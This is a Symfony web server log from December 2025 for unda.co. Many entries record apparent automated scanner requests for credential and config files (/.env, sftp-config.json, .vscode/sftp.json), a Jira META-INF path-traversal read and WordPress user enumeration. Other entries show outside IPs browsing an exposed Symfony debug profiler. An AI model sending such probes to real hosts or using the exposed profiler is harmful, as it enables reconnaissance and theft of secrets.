[2025-12-16 11:05:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:05:50] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
[2025-12-16 11:07:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8ae359","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8ae359?panel=cache","method":"GET"} []
[2025-12-16 11:07:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-16 11:08:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"836ec4","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/836ec4?group=1&panel=db","method":"GET"} []
[2025-12-16 11:08:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
[2025-12-16 11:12:06] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-16 11:12:10] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-16 11:12:36] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-16 11:18:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"819624","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/819624?panel=logger","method":"GET"} []
[2025-12-16 11:18:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-16 11:19:34] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-16 11:27:23] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-16 11:27:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /feed/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /feed/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:27:25] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?feed=rss2","method":"GET"} []
[2025-12-16 11:28:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=45.58.159.9&limit=10&method=GET","method":"GET"} []
[2025-12-16 11:28:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=45.58.159.9&limit=10&method=GET","method":"GET"} []
[2025-12-16 11:32:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1513f9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1513f9?panel=exception","method":"GET"} []
[2025-12-16 11:32:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-16 11:39:43] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"569911","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/569911/search/results?ip=189.172.97.42&limit=10&method=GET","method":"GET"} []
[2025-12-16 11:39:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.97.42&limit=10&method=GET","method":"GET"} []
[2025-12-16 11:48:53] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-16 11:51:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sftp-config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sftp-config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:51:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 11:58:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7478c3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7478c3?panel=cache","method":"GET"} []
[2025-12-16 11:58:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-16 11:58:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb19b2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fb19b2?panel=exception","method":"GET"} []
[2025-12-16 11:58:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-16 12:02:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-16 12:02:30] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 12:02:30] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 12:02:30] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 12:02:30] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 12:02:30] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 12:02:30] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-16 12:18:08] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 12:19:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 12:24:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"006dcb","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/006dcb?panel=router","method":"GET"} []
[2025-12-16 12:24:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-16 12:26:23] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 12:26:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webui/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webui/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 12:27:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2515c0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2515c0?panel=time","method":"GET"} []
[2025-12-16 12:27:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-16 12:38:42] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-16 12:38:42] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-16 12:38:42] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-16 12:38:42] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-16 12:38:42] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 12:38:42] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 12:38:42] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-16 12:38:42] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-16 12:41:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=212.47.64.207&limit=10","method":"GET"} []
[2025-12-16 12:41:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=212.47.64.207&limit=10","method":"GET"} []
[2025-12-16 12:45:32] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"e648d1","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/e648d1/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-16 12:45:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-16 12:49:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ed5b89","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ed5b89?panel=dump","method":"GET"} []
[2025-12-16 12:49:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-16 12:56:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=146.19.24.116&limit=10&method=GET","method":"GET"} []
[2025-12-16 12:56:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=146.19.24.116&limit=10&method=GET","method":"GET"} []
[2025-12-16 13:06:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"bb3b91","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/bb3b91?panel=db","method":"GET"} []
[2025-12-16 13:06:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-16 13:11:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"565723","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/565723?panel=form","method":"GET"} []
[2025-12-16 13:11:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-16 13:17:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"035777","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/035777","method":"GET"} []
[2025-12-16 13:17:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 13:18:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5b05f3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5b05f3","method":"GET"} []
[2025-12-16 13:18:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 13:24:35] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-16 13:24:36] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-16 13:24:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:24:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:24:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:24:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:24:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:24:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
